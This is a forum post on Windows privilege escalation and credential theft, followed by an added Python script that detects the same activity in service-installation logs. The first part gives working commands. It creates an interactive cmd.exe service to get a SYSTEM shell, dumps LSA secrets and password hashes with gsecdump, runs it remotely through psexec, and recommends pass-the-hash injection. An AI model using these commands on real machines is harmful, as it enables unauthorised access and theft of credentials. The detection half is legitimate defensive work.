To get a DOS Prompt as NT system:

C:\>sc create shellcmdline binpath= "C:\WINDOWS\system32\cmd.exe /K start" type= own type= interact
[SC] CreateService SUCCESS

C:\>sc start shellcmdline
[SC] StartService FAILED 1053:

The service did not respond to the start or control request in a timely fashion.

C:\>sc delete shellcmdline
[SC] DeleteService SUCCESS

------------
Then in the new DOS window:

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>whoami
NT AUTHORITY\SYSTEM

C:\WINDOWS\system32>gsecdump -h
gsecdump v0.6 by Johannes Gumbel (johannes.gumbel@truesec.se)
usage: gsecdump [options]

options:
-h [ --help ] show help
-a [ --dump_all ] dump all secrets
-l [ --dump_lsa ] dump lsa secrets
-w [ --dump_wireless ] dump microsoft wireless connections
-u [ --dump_usedhashes ] dump hashes from active logon sessions
-s [ --dump_hashes ] dump hashes from SAM/AD

Although I like to use:

PsExec v1.83 - Execute processes remotely
Copyright (C) 2001-2007 Mark Russinovich
Sysinternals - [url]www.sysinternals.com[/url]

C:\>psexec \\COMPUTER -u user -p password -s -f -c gsecdump.exe -u >Active-HASH.TXT

to get the hashes from active logon sessions of a remote system.

These are a lot better than getting a cachedump of the Cached Credentials because these hashes are LMHashes that can be easily broken with Rainbow Tables.

A tip: you can use iam from the pshtools toolkit to load the HASH information just grabbed with gsecdump into the local lsass process and carry out a hash-injection attack. The foreigners really are impressive; admins will have their hands full now. The LM/NT hashes obtained during ARP spoofing, and those obtained with gethash, never actually needed to be cracked at all; it is just a matter of using the tool. As the original article puts it well, whether the password is set to 4 characters or 127, once you have the hash you are 100% done.
Original source: [url]http://truesecurity.se/blogs/mur ... -text-password.aspx[/url]

I had a look at the original source; it seems to be from /2007/03/16/. Depressing, what a gap.
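From the defender's side, both steps in the post leave the same footprint: each `sc create` and each `psexec -s` run installs a service, and Windows records every service installation in the System log as Event ID 7045 from the Service Control Manager (fields: Service Name, Service File Name, Service Type, Service Start Type, Service Account). The script below is an added example, not code from the post or from Sysinternals/TrueSec, that triages such records for the two patterns above: a service whose binPath is a command interpreter such as cmd.exe, and the PSEXESVC helper service that PsExec registers on the target. The log lines are constructed for the example and use our own `key=value|...` export layout rather than the literal Windows message text; the Service Type field is assumed to carry sc-style type keywords (`own`, `interact`), and the interpreter list is an assumption to be tuned per environment.

```python
"""Triage Windows 'service installed' records (System log, Event ID 7045)
for a service whose executable is a command interpreter, for an
interactive service, and for remote-execution helper services.
Sample records below are CONSTRUCTED; the field names follow the 7045
message, the line layout is this example's own export format."""

# Assumption: interpreters/launchers that do not belong in a legitimate binPath.
INTERPRETERS = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe",
                "cscript.exe", "mshta.exe", "rundll32.exe"}
# Service names registered by remote-execution tools (PSEXESVC is PsExec's).
REMOTE_EXEC_SERVICES = {"psexesvc"}


def parse_7045(line):
    """Return the fields of one exported 7045 record as a dict, or None for
    any other event. Export layout (constructed): key=value pairs joined by '|'."""
    fields = {}
    for part in line.split("|"):
        key, sep, value = part.partition("=")
        if sep:
            fields[key.strip()] = value.strip()
    if fields.get("EventID") != "7045" or "Service File Name" not in fields:
        return None
    return fields


def first_image(bin_path):
    """Executable file name from a binPath value, handling a quoted path
    followed by arguments (e.g. "C:\\Program Files\\x\\svc.exe" -run)."""
    bin_path = bin_path.strip()
    if bin_path.startswith('"'):
        end = bin_path.find('"', 1)
        exe = bin_path[1:end] if end > 0 else bin_path[1:]
    else:
        exe = bin_path.split()[0] if bin_path else ""
    return exe.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def triage(record):
    """List the reasons a 7045 record is suspicious (empty list = benign)."""
    reasons = []
    exe = first_image(record["Service File Name"])
    if exe in INTERPRETERS:
        reasons.append(f"binPath runs an interpreter ({exe})")
    if record["Service Name"].lower() in REMOTE_EXEC_SERVICES:
        reasons.append("remote-execution helper service")
    # Assumption: the exported Service Type carries sc-style keywords.
    if "interact" in record.get("Service Type", "").lower():
        reasons.append("interactive service (desktop access)")
    return reasons


def scan(lines):
    """Return (service name, binPath, reasons) for every record that trips a rule."""
    findings = []
    for line in lines:
        rec = parse_7045(line)
        if rec is None:
            continue
        reasons = triage(rec)
        if reasons:
            findings.append((rec["Service Name"], rec["Service File Name"], reasons))
    return findings


# Constructed sample export: the shell service from the post, a normal
# service, the PsExec helper service, and an unrelated 7036 state change.
SAMPLE_LOG = [
    r"EventID=7045|Service Name=shellcmdline|Service File Name=C:\WINDOWS\system32\cmd.exe /K start|Service Type=own interact|Service Start Type=demand start|Service Account=LocalSystem",
    r"EventID=7045|Service Name=Spooler|Service File Name=C:\WINDOWS\system32\spoolsv.exe|Service Type=own|Service Start Type=auto start|Service Account=LocalSystem",
    r"EventID=7045|Service Name=PSEXESVC|Service File Name=%SystemRoot%\PSEXESVC.EXE|Service Type=own|Service Start Type=demand start|Service Account=LocalSystem",
    r"EventID=7036|Service Name=Spooler|State=running",
]

if __name__ == "__main__":
    for name, path, reasons in scan(SAMPLE_LOG):
        print(f"{name}: {path}")
        for r in reasons:
            print(f"    - {r}")
```

Run as-is it reports shellcmdline (interpreter in binPath, interactive type) and PSEXESVC, and stays silent on the Spooler records. Because the post's service is deleted seconds after creation, the 7045 record is often the only durable trace, so it is worth forwarding these events off-host rather than relying on the live service list.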